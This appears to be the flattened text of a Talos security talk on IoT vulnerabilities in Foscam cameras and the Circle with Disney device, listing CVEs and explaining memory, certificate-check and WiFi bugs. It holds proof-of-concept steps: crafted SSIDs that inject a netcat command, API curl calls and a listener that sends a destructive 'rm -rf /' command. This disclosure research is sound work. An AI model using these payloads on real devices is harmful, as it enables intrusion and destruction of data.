IOT RCE, a Study with Disney Lilith Wyatt

IOT RCE, a Study with Disney Lilith Wyatt

IOT RCE, a Study with Disney Lilith Wyatt <(^_^)> Vulndev Research Engineer My Team and I Research Engineer with the Talos Security and Research Group I'm a member of the Vulndev Team We reverse, we fuzz, we actually read manuals Our goal is to find zero day vulnerabilities in third party products. (But not on Cisco stuff) We submit the bugs to make third party software more secure, and by extension, also our customers.

Signatures for our zero-days get put into all of our products. Youngest member on the team (thats my excuse), and Im super lucky and thankful that Im able to work with such talented people. My Team and I Team Members: Yves Younan - Research Manager Research Engineers: Aleksandar Nikolich Ali Rizvi-Santiago Marcin Noga Piotr Bania Tyler Bohan Cory Duplantis

Lilith Wyatt <('.'<) Claudio Bozzato Martin Zeiser Bugs included target vendors such as: - Microsoft - Apple - Oracle - Adobe - Google - IBM, HP, Intel, Lexmark - 7zip, libarchive, NTP - Vmware Special Thanks A shout out to one team member in particular, Claudio Bozzato,

with whom all this Circle research was done. He's one of our embedded device experts, and without him, I probably would have bricked my device twice as many times. He did most of the Foscam bugs, and probably half of the Circle bugs, so I feel sorta bad talking alone up here. Sorta. The IOT Conundrum (& Cliche) The IOT Conundrum (& Cliche) Since I'm lazy, a quote from ZDNet about a quote from Cisco: Globally, devices and connections (including M2M connections, smartphones, connected TVs, etc.) are growing faster than the population, Cisco notes. The report projects that the average number of devices and connections per capita will grow globally from two in 2015 to 3.2 by 2020. ([1] Source: http://www.zdnet.com/article/iot-will-account-for-nearly-half-of-connected-devices-by-2020-cisco-says/) And if the population ends up being 7.5 Billion as projected by the U.S. Census... => 22.4 Billion Projected Devices/Connections (I.e. a few) ([2] Source: https://www.census.gov/population/international/data/idb/worldpopgraph.php)

The IOT Conundrum (& Cliche) Okay, so there's a few IOT devices on the internet, and there's going to be a few more. What characterizes a typical IOT device? - Typically arm/mips 32-bit/64-bit devices running some variant of Linux - Contains sensors not normally found in desktop computers (e.g an accelerometer) - Talks to other devices on the network/internet/local proximity (Bluetooth/Zigbee). The IOT Conundrum (& Cliche) Okay, so there's a few IOT devices on the internet, and there's going to be a few more. What characterizes a typical IOT device? - Typically arm/mips 32-bit/64-bit devices running some variant of Linux - Contains sensors not normally found in desktop computers (e.g an accelerometer) - Talks to other devices on the network/internet/local proximity (Bluetooth/Zigbee). Unfortunately, there's also a few other characteristics inherent in most IOT devices. -Asynchronous Communications (i.e. controlling the device from anywhere) -Lack of firmware updates/Outdated firmware -Autoconfiguration/Ease-of-Setup Mishaps -Exposed Network Ports -Buggy Code

#SetItAndForgetIt The IOT Conundrum (& Cliche) Case in point: Internet Chemotherapy - Dr Cyborkian a.k.a. janit0r (https://ghostbin.com/paste/q2vq2) Bricker Bot: More than 2 million devices were bricked by a telnet/ssh crawler that logged in using basic and/or factory default credentials. Hikvision/Dahua Devices: 1.1 million internet exposed CCTV and cameras followed suit via a variety of authentication bypasses. Doing it Wrong: Foscam Doing it Wrong: Foscam CVE-2017-2805

CVE-2017-2848 CVE-2017-0327 CVE-2017-2849 CVE-2017-2828 CVE-2017-2850 CVE-2017-2829 CVE-2017-2851 CVE-2017-2830 CVE-2017-2854 CVE-2017-2855 CVE-2017-2831 CVE-2017-2856 CVE-2017-2857 CVE-2017-2871 CVE-2017-2832 CVE-2017-2872 CVE-2017-2841 CVE-2017-2873 CVE-2017-2842

CVE-2017-2877 CVE-2017-2843 CVE-2017-2878 CVE-2017-2844 CVE-2017-2879 CVE-2017-2845 CVE-2017-2846 CVE-2017-2847 CVE-2017-2833 CVE-2017-2832 Foscam Foscam Foscam Foscam Foscam Foscam Foscam Foscam

Foscam Foscam Foscam Foscam Foscam Foscam Foscam Foscam Foscam Foscam Foscam Foscam Foscam Foscam Foscam Foscam Foscam Foscam Foscam

Foscam Foscam Foscam IP IP IP IP IP IP IP IP IP IP IP IP IP IP IP

IP IP IP IP IP IP IP IP IP IP IP IP IP IP IP Video Video Video

Video Video Video Video Video Video Video Video Video Video Video Video Video Video Video Video Video Video Video

Video Video Video Video Video Video Video Video Camera Camera Camera Camera Camera Camera Camera Camera Camera Camera

Camera Camera Camera Camera Camera Camera Camera Camera Camera Camera Camera Camera Camera Camera Camera Camera Camera Camera Camera

Camera WebService CGI Parameter Code Execution Vulnerability CGIProxy.fcgi DNS2 Address Configuration Command Injection Vulnerability CGIProxy.fcgi Account Creation Command Injection Vulnerability CGIProxy.fcgi NTP Server Configuration Command Injection Vulnerability CGIProxy.fcgi Account Password Command Injection Vulnerability CGIProxy.fcgi Change Username pureftpd.passwd Injection Vulnerability CGIProxy.fcgi Message 0x3001 Directory Traversal Vulnerability CGIProxy.fcgi Wifi Settings Code Execution Vulnerability CGIProxy.fcgi Message 0x3001 Multi-part Form Boundary Code Execution Vulnerability webService oray.com DDNS Client Code Execution Vulnerability webService 3322.net DDNS Client Code Execution Vulnerability CGIProxy.fcgi Query Append Code Execution Vulnerability webService dyndns.com DDNS Client Code Execution Vulnerability webService 9299.org DDNS Client Code Execution Vulnerability Firmware Recovery Unsigned Image Vulnerability CGIProxy.fcgi Account Deletion Command Injection Vulnerability CGIProxy.fcgi Firmware Upgrade Unsigned Image Vulnerability

CGIProxy.fcgi SMTP Test Host Parameter Configuration Command Injection Vulnerability CGIProxy.fcgi SoftAP Configuration Command Injection Vulnerability CGIProxy.fcgi SMTP Test User Parameter Configuration Command Injection Vulnerability devMng Multi-Camera Port 10001 Command 0x0064 Empty AuthResetKey Vulnerability CGIProxy.fcgi SMTP Test Password Parameter Configuration Command Injection Vulnerability CGIProxy.fcgi logOut Code Execution Vulnerability CGIProxy.fcgi SMTP Test Sender Parameter Configuration Command Injection Vulnerability UPnP Discovery Code Execution Vulnerability CGIProxy.fcgi SMTP Test Command Injection Vulnerability CGIProxy.fcgi Gateway Address Configuration Command Injection Vulnerability CGIProxy.fcgi DNS1 Address Configuration Command Injection Vulnerability CGIProxy.fcgi FTP Startup Configuration Command Injection Vulnerability (prior "coverage) CGIProxy.fcgi Query Parameter Parsing Code Execution Vulnerability Doing it Right: Amazon Key Doing it Right: Amazon Key CVE List: - Denial of Service Vuln by Rhino Security Labs

(https://www.youtube.com/watch?v=2GSK7cIimFY) Case Study: Circle With Disney Case Study: Circle With Disney Quick Overview: -Allows an administrator/parent to monitor and restrict usage of the other people on the network. - Has varying levels of restrictions for different age groups. - Once plugged in/configured for a network, it starts ARP Poisoning every other device on the network in order to monitor and restrict. -Incompatible with any device/application that use SSL Cert Pinning (since this thing MITMs SSL traffic too). -Uses Blue Coat Systems to also filter unknown URL domains (including for VPN connections). Case Study: Circle With Disney

CVE-2017-2864 - Circle with Disney Authentication Bypass Vulnerability CVE-2017-2917 - Circle with Disney configure.xml Notifications Command Injection Vulnerability CVE-2017-2865 - Circle with Disney Firmware Update Command Injection Vulnerability CVE-2017-12083 - Circle with Disney Apid Use-Between-Reallocs Information Disclosure Vulnerability CVE-2017-2866 - Circle with Disney Backup API Command Injection Vulnerability CVE-2017-12084 - Circle with Disney Rclient SSH Persistent Backdoor Vulnerability CVE-2017-2881 - Circle with Disney check_torlist.sh Update Code Execution Vulnerability CVE-2017-12085 - Circle with Disney Token Routing Vulnerability CVE-2017-2882 - Circle with Disney check_circleservers Code Execution Vulnerability CVE-2017-12094 - Circle with Disney Startup WiFi Channel Parsing Command Injection Vulnerability CVE-2017-12095 - Circle with Disney WiFi Insecure Access Point Vulnerability CVE-2017-2883 - Circle with Disney Database Updater Code Execution Vulnerability CVE-2017-12096 - Circle with Disney WiFi Security Downgrade Vulnerability CVE-2017-2884 - Circle with Disney Apid Photo Upload Denial of Service Vulnerability CVE-2017-2889 - Circle with Disney Apid Server Fork Denial of Service Vulnerability CVE-2017-2890 - Circle with Disney Restore API Command Injection Vulnerability CVE-2017-2911 - Circle with Disney Rclient SSL TLD MITM Vulnerability CVE-2017-2912 - Circle with Disney Goclient SSL TLD MITM Vulnerability CVE-2017-2913 - Circle with Disney libbluecoat.so SSL TLD MITM Vulnerability

CVE-2017-2915 - Circle with Disney WiFi Restart SSID Parsing Command Injection Vulnerability Case Study: Circle With Disney Obligatory Pie Chart/Bug Breakdown Command Injection (9) Misc. (8) String Handling (4) Total: 23 Memory Management

(2) Case Study: Circle With Disney But we're not going to cover them all... CVE-2017-2864 - Circle with Disney Authentication Bypass Vulnerability CVE-2017-2917 - Circle with Disney configure.xml Notifications Command Injection Vulnerability CVE-2017-2865 - Circle with Disney Firmware Update Command Injection Vulnerability CVE-2017-12083 - Circle with Disney Apid Use-Between-Reallocs Information Disclosure Vulnerability CVE-2017-2866 - Circle with Disney Backup API Command Injection Vulnerability CVE-2017-12084 - Circle with Disney Rclient SSH Persistent Backdoor Vulnerability CVE-2017-2881 - Circle with Disney check_torlist.sh Update Code Execution Vulnerability CVE-2017-12085 - Circle with Disney Token Routing Vulnerability CVE-2017-2882 - Circle with Disney check_circleservers Code Execution Vulnerability CVE-2017-12094 - Circle with Disney Startup WiFi Channel Parsing Command Injection Vulnerability CVE-2017-12095 - Circle with Disney WiFi Insecure Access Point Vulnerability CVE-2017-2883 - Circle with Disney Database Updater Code Execution Vulnerability CVE-2017-12096 - Circle with Disney WiFi Security Downgrade Vulnerability CVE-2017-2884 - Circle with Disney Apid Photo Upload Denial of Service Vulnerability

CVE-2017-2889 - Circle with Disney Apid Server Fork Denial of Service Vulnerability CVE-2017-2890 - Circle with Disney Restore API Command Injection Vulnerability CVE-2017-2911 - Circle with Disney Rclient SSL TLD MITM Vulnerability CVE-2017-2912 - Circle with Disney Goclient SSL TLD MITM Vulnerability CVE-2017-2913 - Circle with Disney libbluecoat.so SSL TLD MITM Vulnerability CVE-2017-2915 - Circle with Disney WiFi Restart SSID Parsing Command Injection Vulnerability Case Study: Circle With Disney But we're not going to cover them all...Just these, since they're interesting (imo) CVE-2017-12085 - Circle with Disney Token Routing Vulnerability CVE-2017-2911 - Circle with Disney Rclient SSL TLD MITM Vulnerability CVE-2017-2912 - Circle with Disney Goclient SSL TLD MITM Vulnerability CVE-2017-2913 - Circle with Disney libbluecoat.so SSL TLD MITM Vulnerability CVE-2017-2915 - Circle with Disney WiFi Restart SSID Parsing Command Injection Vulnerability CVE-2017-12094 - Circle with Disney Startup WiFi Channel Parsing Command Injection Vulnerability CVE-2017-12083 - Circle with Disney Apid Use-Between-Reallocs Information Disclosure Vulnerability Use-After-Realloc CVE-2017-12083 - Circle with Disney Apid Use-Between-Reallocs Information Disclosure Vulnerability

Why Mention it? Because it is a lesser known type of memory corruption that can lead to the classical Use-After-Free vulnerability that we all know and love. What is it? As the name implies, we're allocating memory in the heap, assigning variables to this memory, and then reallocating it after the fact. This can lead to dangling pointers, and UAF conditions. Use-After-Realloc CVE-2017-12083 - Circle with Disney Apid Use-Between-Reallocs Information Disclosure Vulnerability Quick refresher on x64 Linux Memory Layout Heap Shared

Libs. Stack V D S O Things to note: -If ASLR is turned on, the addresses of the Stack/Shared libraries are randomized. -The heap's location seems to only be based on the code (.text) location, which is only randomized when compiled as a PIE binary. -The stack and the heap grow towards each other.

Code Heap 0x0 Shared Libs. Stack Kernel Mem. 0x00007fffffffffff 0xffffffffffffffff Use-After-Realloc CVE-2017-12083 - Circle with Disney Apid Use-Between-Reallocs Information Disclosure Vulnerability Quick Overview on Uclibc malloc

Heap Not yet allocated (but still heap) Not allocated/ Not heap (yet) (mmap/mbrk) Shared Libs. Things to note: - Big allocations (>1MB) get mmap'ed into the area before the shared libraries. Heap

Shared Libs. Stack V D S O Use-After-Realloc CVE-2017-12083 - Circle with Disney Apid Use-Between-Reallocs Information Disclosure Vulnerability Quick Overview on Uclibc malloc https://www.win.tue.nl/~aeb/linux/hh/hh-11.html Methods: void *malloc(size_t size);

- Allocate a new chunk of memory of designated size. void *calloc(size_t nmemb, size_t size); - same as malloc, but allocates size*nmemb and clears out the memory allocated. void free(void *ptr); - de-allocate a given chunk. void * realloc(void *ptr, size_t size); - re-allocate a given chunk to a desired size. Use-After-Realloc CVE-2017-12083 - Circle with Disney Apid Use-Between-Reallocs Information Disclosure Vulnerability Back on track, what's this Use-After-Reallocs thing? void * realloc(void *ptr, size_t size); - re-allocate a given chunk to a desired size. Things to note: - If the heap is full, but a small allocation

Happens, the size of the heap will increase. Example: void * chunk2 = malloc(0x20); chunk2 = realloc(chunk2, 0x40); Heap Chunk1 (size:0x20) Heap Chunk1 (size:0x20) - But Big allocations (>1MB) get mmap'ed into the mmap/mbrk area. Chunk2

(Size:0x20) Chunk2 (Size:0x40) Mmap/ mbrk Use-After-Realloc CVE-2017-12083 - Circle with Disney Apid Use-Between-Reallocs Information Disclosure Vulnerability For the normal usage of realloc (where both params != Null), It essentially acts as a If (malloc(new_size)!=Null) { free(old_chunk); } Things to note: - realloc(Null,0x20) == malloc(0x20) - realloc(ptr,Null) == free(ptr) Example: void * chunk2 = malloc(0x20);

chunk2 = realloc(chunk2, 0x40); Heap Chunk1 (size:0x20) Heap Chunk1 (size:0x20) Chunk2 (Size:0x20) Chunk2 (Size:0x40) Mmap/

mbrk Use-After-Realloc CVE-2017-12083 - Circle with Disney Apid Use-Between-Reallocs Information Disclosure Vulnerability For the normal usage of realloc (where both params != Null), It essentially acts as a If (malloc(new_size)!=Null) { free(old_chunk); } Theres no guarantee the pointer passed in is the same one! you get back! Heap Chunk1 (size:0x20) Chunk2 (Size:0x20) Things to note:

- realloc(Null,0x20) == malloc(0x20) - realloc(ptr,Null) == free(ptr) Heap Chunk1 (size:0x20) Chunk2 (Size:0x40) Mmap/ mbrk Use-After-Realloc CVE-2017-12083 - Circle with Disney Apid Use-Between-Reallocs Information Disclosure Vulnerability For the normal usage of realloc (where both params != Null), It essentially acts as a If (malloc(new_size)!=Null) { free(old_chunk); }

Theres no guarantee the pointer passed in is the same one! you get back! Heap Chunk1 (size:0x20) Heap Chunk1 (size:0x20) Chunk2 (Size:0x20) Example: void * chunk2 = malloc(0x20); chunk2 = realloc(chunk2, 0x10000000);

Chunk2 (Size:0x10000000) Use-After-Realloc CVE-2017-12083 - Circle with Disney Apid Use-Between-Reallocs Information Disclosure Vulnerability There's 2 conditions in which realloc causes the underlying memory buffer to shift. Heap Chunk1 (size:0x20) Heap Chunk1 (size:0x20) Chunk2

(Size:0x20) Example 1: void * chunk2 = malloc(0x20); chunk2 = realloc(chunk2, 0x10000000); Chunk2 (Size:0x10000000) Use-After-Realloc CVE-2017-12083 - Circle with Disney Apid Use-Between-Reallocs Information Disclosure Vulnerability There's 2 conditions in which realloc causes the underlying memory buffer to shift. Heap Chunk1 (size:0x20) Heap

Chunk1 (size:0x20) Heap Chunk1 (size:0x20) Heap Chunk1 (size:0x20) Example 1: void * chunk2 = malloc(0x20); chunk2 = realloc(chunk2, 0x10000000); Chunk2

(Size:0x20) Chunk2 (Size:0x10000000) Chunk2 (Size:0x20) Chunk3 (size:0x30) Chunk3 (size:0x30) Example 2: void * chunk2 = malloc(0x20); Void * chunk3 = malloc(0x30); chunk2 = realloc(chunk2, 0x60);

Chunk2 (Size:0x60) Use-After-Realloc CVE-2017-12083 - Circle with Disney Apid Use-Between-Reallocs Information Disclosure Vulnerability Which means that all pointers assigned to the buffer need to be updated after the Reallocation, to prevent dangling pointers. Heap Chunk1 (size:0x20) Chunk2 (Size:0x20) output_str Heap

Chunk1 (size:0x20) Example: void * chunk2 = malloc(0x20); char * output_str = chunk2+0x10; chunk2 = realloc(chunk2, 0x10000000); Chunk2 (Size:0x10000000) output_str Use-After-Realloc CVE-2017-12083 - Circle with Disney Apid Use-Between-Reallocs Information Disclosure Vulnerability And then, it's a classic UAF situation, if you can allocate around the same address. Heap

Chunk1 (size:0x20) (After realloc) Heap Chunk1 (size:0x20) Chunk2 (Size:0x10000000) output_str Attacker chunk (size:0x20)

output_str Example: void * chunk2 = malloc(0x20); char * output_str = chunk2+0x10; chunk2 = realloc(chunk2, 0x10000000); Chunk2 (Size:0x10000000) Use-After-Realloc CVE-2017-12083 - Circle with Disney Apid Use-Between-Reallocs Information Disclosure Vulnerability TL;DR, we could dump database strings via an HTTP request: # python get_bodied.py [O_O] GOGOGO (Connected to circle...) [~_~] S-s-s-sendding!!!?! len: 0x105d [o_o] gotta response!

[O_O] gotta another response! 4:51 GMT Vary: Accept-Encoding, Origin Access-Control-Allow-Origin: [email protected]

SSL Attribute Parsing CVE-2017-2911 - Circle with Disney Rclient SSL TLD MITM Vulnerability CVE-2017-2912 - Circle with Disney Goclient SSL TLD MITM Vulnerability CVE-2017-2913 - Circle with Disney libbluecoat.so SSL TLD MITM Vulnerability Quick Intermission SSL Attribute Parsing CVE-2017-2911 - Circle with Disney Rclient SSL TLD MITM Vulnerability CVE-2017-2912 - Circle with Disney Goclient SSL TLD MITM Vulnerability CVE-2017-2913 - Circle with Disney libbluecoat.so SSL TLD MITM Vulnerability Quick Intermission *.meetcircle.com

SSL Attribute Parsing CVE-2017-2911 - Circle with Disney Rclient SSL TLD MITM Vulnerability CVE-2017-2912 - Circle with Disney Goclient SSL TLD MITM Vulnerability CVE-2017-2913 - Circle with Disney libbluecoat.so SSL TLD MITM Vulnerability SSL Attribute Parsing CVE-2017-2911 - Circle with Disney Rclient SSL TLD MITM Vulnerability CVE-2017-2912 - Circle with Disney Goclient SSL TLD MITM Vulnerability CVE-2017-2913 - Circle with Disney libbluecoat.so SSL TLD MITM Vulnerability char * X509_NAME_oneline(X509_NAME *xname, char *buf, int bsize); X509_NAME_oneline() prints an ASCII version of the xname parameter to buf. At most bsize bytes will be written. If buf is NULL then a buffer is dynamically allocated and returned, otherwise buf is returned. e.g. `/C=US/ST=Sad/L=boop/O=<(^_^)>/CN=boopdoop.net`

(TL;DR, never use X509_name_oneline) SSL Attribute Parsing CVE-2017-2911 - Circle with Disney Rclient SSL TLD MITM Vulnerability CVE-2017-2912 - Circle with Disney Goclient SSL TLD MITM Vulnerability CVE-2017-2913 - Circle with Disney libbluecoat.so SSL TLD MITM Vulnerability The Certificate Validation Code: .text:00402A4C .text:00402A54 .text:00402A58 .text:00402A5C .text:00402A60 .text:00402A64 .text:00402A68 .text:00402A6C .text:00402A70 .text:00402A74

.text:00402A78 .text:00402A7C jal X509_NAME_oneline sw $v0, 0x38+oneline_buff_malloced($fp) lw $a0, 0x38+oneline_buff_malloced($fp) lui $v0, 0x41 addiu $a1, $v0, (aCn_meetcircle_ - 0x410000) # "CN=*.meetcircle.com" jal strstr nop bnez $v0, loc_402A94 nop li $a0, 3 lui $v0, 0x41 addiu $a1, $v0, (aInvalidCertifi - 0x410000) # "Invalid certificate\n"

SSL Attribute Parsing CVE-2017-2911 - Circle with Disney Rclient SSL TLD MITM Vulnerability CVE-2017-2912 - Circle with Disney Goclient SSL TLD MITM Vulnerability CVE-2017-2913 - Circle with Disney libbluecoat.so SSL TLD MITM Vulnerability The Certificate Validation Code: .text:00402A4C .text:00402A54 .text:00402A58 .text:00402A5C .text:00402A60 .text:00402A64 .text:00402A68 .text:00402A6C .text:00402A70 .text:00402A74 .text:00402A78 .text:00402A7C

We get our oneline buffer... jal X509_NAME_oneline sw $v0, 0x38+oneline_buff_malloced($fp) lw $a0, 0x38+oneline_buff_malloced($fp) lui $v0, 0x41 addiu $a1, $v0, (aCn_meetcircle_ - 0x410000) # "CN=*.meetcircle.com" jal strstr nop bnez $v0, loc_402A94 nop And then try to find this str li $a0, 3 lui $v0, 0x41 addiu $a1, $v0, (aInvalidCertifi - 0x410000) # "Invalid certificate\n"

inside of it! SSL Attribute Parsing CVE-2017-2911 - Circle with Disney Rclient SSL TLD MITM Vulnerability CVE-2017-2912 - Circle with Disney Goclient SSL TLD MITM Vulnerability CVE-2017-2913 - Circle with Disney libbluecoat.so SSL TLD MITM Vulnerability Back to our example from before: '/C=US/ST=Sad/L=boop/O=<(^_^)>/CN=boopdoop.net' 'CN=*.meetcircle.com' So obviously this would not be a match. But the funny thing about certificates, is that there's not many restrictions, in generating certificatesThe only limiting factor in generating a certificate is if you can get someone to actually sign it.

SSL Attribute Parsing CVE-2017-2911 - Circle with Disney Rclient SSL TLD MITM Vulnerability CVE-2017-2912 - Circle with Disney Goclient SSL TLD MITM Vulnerability CVE-2017-2913 - Circle with Disney libbluecoat.so SSL TLD MITM Vulnerability One Hilarious attack: Create a certificate with another attribute that matches. '/C=US/ST=Sad/L=boop/O=CN=*.meetcircle.com/CN=boopdoop.net' 'CN=*.meetcircle.com' Unfortunately, the Circle has a hardcoded CA cert check too (Comodo/Entrust), and the certificates signed by them had their other attributes overwritten. [>_<] Source: https://langui.sh/2016/01/29/x509-name-oneline/ SSL Attribute Parsing CVE-2017-2911 - Circle with Disney Rclient SSL TLD MITM Vulnerability CVE-2017-2912 - Circle with Disney Goclient SSL TLD MITM Vulnerability CVE-2017-2913 - Circle with Disney libbluecoat.so SSL TLD MITM Vulnerability

Hilarious attack #2: (And this is honestly just kind of silly...) '/C=US/ST=Sad/L=boop/CN=<(^_^)>/CN=boopdoop.net' We've established this already.... 'CN=*.meetcircle.com' SSL Attribute Parsing CVE-2017-2911 - Circle with Disney Rclient SSL TLD MITM Vulnerability CVE-2017-2912 - Circle with Disney Goclient SSL TLD MITM Vulnerability CVE-2017-2913 - Circle with Disney libbluecoat.so SSL TLD MITM Vulnerability Hilarious attack #2: (And this is honestly just kind of silly...) '/C=US/ST=Sad/L=boop/CN=<(^_^)>/CN=boopdoop.net' We've established this already.... 'CN=*.meetcircle.com' '/C=US/ST=Sad/L=boop/CN=<(^_^)>/OU=CN=*.meetcircle.com And no CA is going to sign this... SSL Attribute Parsing

CVE-2017-2911 - Circle with Disney Rclient SSL TLD MITM Vulnerability CVE-2017-2912 - Circle with Disney Goclient SSL TLD MITM Vulnerability CVE-2017-2913 - Circle with Disney libbluecoat.so SSL TLD MITM Vulnerability Hilarious attack #2: (And this is honestly just kind of silly...) '/C=US/ST=Sad/L=boop/CN=<(^_^)>/CN=boopdoop.net' We've established this already.... 'CN=*.meetcircle.com' But what about this? ^_^ '/C=US/ST=Sad/L=boop/CN=<(^_^)>/CN=*.meetcircle.company And no CA is going to sign this... SSL Attribute Parsing CVE-2017-2911 - Circle with Disney Rclient SSL TLD MITM Vulnerability CVE-2017-2912 - Circle with Disney Goclient SSL TLD MITM Vulnerability CVE-2017-2913 - Circle with Disney libbluecoat.so SSL TLD MITM Vulnerability Hilarious attack #2: TLD Extension Bypasses

'CN=*.meetcircle.com' These are all valid domains that will bypass the SSL domain name check, and will also actually be signed by a CA: CN=*.meetcircle.computer CN=*.meetcircle.company CN=*.meetcircle.community There's generally >= 1 for every common TLD .net .network .org .organic Etc. SSL Attribute Parsing CVE-2017-2911 - Circle with Disney Rclient SSL TLD MITM Vulnerability CVE-2017-2912 - Circle with Disney Goclient SSL TLD MITM Vulnerability CVE-2017-2913 - Circle with Disney libbluecoat.so SSL TLD MITM Vulnerability I realize these weren't the most sophisticated attacks, so I'm not going to spend too much more time here, but the sensitivity and potentially compromising

nature of the data that was flowing over these insecurely implemented connections was definitely no joke (even if the exploits were ^_^). Wifi SSID Vulnerabilities CVE-2017-2915 - Circle with Disney WiFi Restart SSID Parsing Command Injection Vulnerability CVE-2017-12094 - Circle with Disney Startup WiFi Channel Parsing Command Injection Vulnerability CVE-2017-12095 - Circle with Disney WiFi Insecure Access Point Vulnerability Why Mention it? The attack vector for the following bugs were all over unauthenticated WIFI wireless communications. (#IoTWarDriving?) Wifi SSID Vulnerabilities CVE-2017-2915 - Circle with Disney WiFi Restart SSID Parsing Command Injection Vulnerability CVE-2017-12094 - Circle with Disney Startup WiFi Channel Parsing Command Injection Vulnerability CVE-2017-12095 - Circle with Disney WiFi Insecure Access Point Vulnerability Hopefully this is a fair assessment, but IOT devices are more geared toward

casual consumers and not your average techie; they mostly try to use a plug-and-play and zero-configuration setup. In the case of the Circle with Disney, this manifests in the fact that you only need to configure an ESSID and password for the network that the Circle will be connecting to and managing. Wifi SSID Vulnerabilities CVE-2017-2915 - Circle with Disney WiFi Restart SSID Parsing Command Injection Vulnerability CVE-2017-12094 - Circle with Disney Startup WiFi Channel Parsing Command Injection Vulnerability CVE-2017-12095 - Circle with Disney WiFi Insecure Access Point Vulnerability - Whenever the Circle gets disconnected from your wireless, it will naturally try to reconnect, as expected. -But it unfortunately only checks/uses the ESSID and Password for this, not the security options of the Access point. -So if you happen to be broadcasting another password-less ESSID with the same name as the ESSID that the Circle is connected to, and then also just happen to deauth the Circle from it's current network....

Wifi SSID Vulnerabilities CVE-2017-2915 - Circle with Disney WiFi Restart SSID Parsing Command Injection Vulnerability CVE-2017-12094 - Circle with Disney Startup WiFi Channel Parsing Command Injection Vulnerability CVE-2017-12095 - Circle with Disney WiFi Insecure Access Point Vulnerability - Whenever the Circle gets disconnected from your wireless, it will naturally try to reconnect, as expected. -But it unfortunately only checks/uses the ESSID and Password for this, not the security options of the Access point. -So if you happen to be broadcasting another password-less ESSID with the same name as the ESSID that the Circle is connected to, and then also just happen to deauth the Circle from it's current network.... You get a free Circle on your network! Wifi SSID Vulnerabilities CVE-2017-2915 - Circle with Disney WiFi Restart SSID Parsing Command Injection Vulnerability CVE-2017-12094 - Circle with Disney Startup WiFi Channel Parsing Command Injection Vulnerability CVE-2017-12095 - Circle with Disney WiFi Insecure Access Point Vulnerability

- And while the previous vulnerability might be a tad boring, if you give a hacker connectivity to an insecure IOT device, theyll probably want a shell too Wifi SSID Vulnerabilities CVE-2017-2915 - Circle with Disney WiFi Restart SSID Parsing Command Injection Vulnerability CVE-2017-12094 - Circle with Disney Startup WiFi Channel Parsing Command Injection Vulnerability CVE-2017-12095 - Circle with Disney WiFi Insecure Access Point Vulnerability Example 1: -- Clear out the current the SSID name thats configured. $ curl -k "https://${sIP}:4567/api/UPDATE/wifi/ssid?token=${sToken}&value=" -- Configure our own hotspot for the injection: $ cat << 'EOF' > hostapd.conf interface=wlan0 channel=1 ssid2=P"\"\n Encryption: \";`nc *`" EOF $ hostapd -B ./hostapd.conf

https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0422 Wifi SSID Vulnerabilities CVE-2017-2915 - Circle with Disney WiFi Restart SSID Parsing Command Injection Vulnerability CVE-2017-12094 - Circle with Disney Startup WiFi Channel Parsing Command Injection Vulnerability CVE-2017-12095 - Circle with Disney WiFi Insecure Access Point Vulnerability Example 1: -- force an AP scan, so that ap_list.out will contain the crafted SSID $ curl -k "https://${sIP}:4567/api/SCAN?token=${sToken}" -- So now the /tmp/ap_list.out file contains our SSID: Cell 12 - Address: AB:CD:EF:12:34:56 ESSID: "" Encryption: ";`nc *`" Mode: Master Channel: 6 Signal: -43 dBm Quality: 67/70 Encryption: WPA2 PSK (CCMP) -- Following command will get run after disconnecting/connecting to ethernet

system('/mnt/shares/usr/bin/scripts/restart_wifi.sh %s "%s" "%s" % (channel, security, hidden)) => sh -c /mnt/shares/usr/bin/scripts/restart_wifi.sh "";`nc *`"" "" https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0422 Wifi SSID Vulnerabilities CVE-2017-2915 - Circle with Disney WiFi Restart SSID Parsing Command Injection Vulnerability CVE-2017-12094 - Circle with Disney Startup WiFi Channel Parsing Command Injection Vulnerability CVE-2017-12095 - Circle with Disney WiFi Insecure Access Point Vulnerability Example 1: -- Since `nc` is running from /tmp/services/configd, theres only 2 files, so `nc *` turns into `nc run supervise`. Apparently for Busybox, this results in a DNS lookup of run, and a connection to tcp port 0. -- make any connection to port 0 be redirected to port 8888 $ iptables -t nat -I PREROUTING -p tcp --dport 0 -j REDIRECT --to-ports 8888 -- listen on port 8888 and send the command to execute on the device $ echo /bin/rm rf /" | nc -nlp 8888 -- unplug and replug the ethernet cable, after a few seconds the command above should be executed => Command Execution.

https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0422 Wifi SSID Vulnerabilities CVE-2017-2915 - Circle with Disney WiFi Restart SSID Parsing Command Injection Vulnerability CVE-2017-12094 - Circle with Disney Startup WiFi Channel Parsing Command Injection Vulnerability CVE-2017-12095 - Circle with Disney WiFi Insecure Access Point Vulnerability Example 2: Access Point List Parsing When initially setting up, the Circle must display wifi SSIDs for it to connect to: #!/bin/sh ifconfig ra0 up iwinfo ra0 scan > /tmp/ap_list.out `iwinfo` prints a list of Access Points detected by `ra0`, every entry has the following form : Cell 01 - Address: 11:22:33:44:55:66 ESSID: "valid-ssid" Mode: Master Channel: 1 Signal: -22 dBm Quality: 70/70 Encryption: WPA2 PSK (CCMP)

https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0446 Wifi SSID Vulnerabilities CVE-2017-2915 - Circle with Disney WiFi Restart SSID Parsing Command Injection Vulnerability CVE-2017-12094 - Circle with Disney Startup WiFi Channel Parsing Command Injection Vulnerability CVE-2017-12095 - Circle with Disney WiFi Insecure Access Point Vulnerability Example 2: Access Point List Parsing When taking the ap_list.out file and outputting the results, it runs a big scary awk command: best_ch=`awk 'BEGIN{max=-1000;} /Channel:/{ch=$4} /Signal/{s=$2+0; if (s>max){max=s; maxch=ch}} END{print maxch}' /tmp/ap_list.out` So if we broadcast an ssid with hostapd like so: ssid2=P"Channel: #Signal" TL;DR: We can inject ~16 byte string into the $best_ch var. (32 bytes len(Channel: #Signal)) https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0446

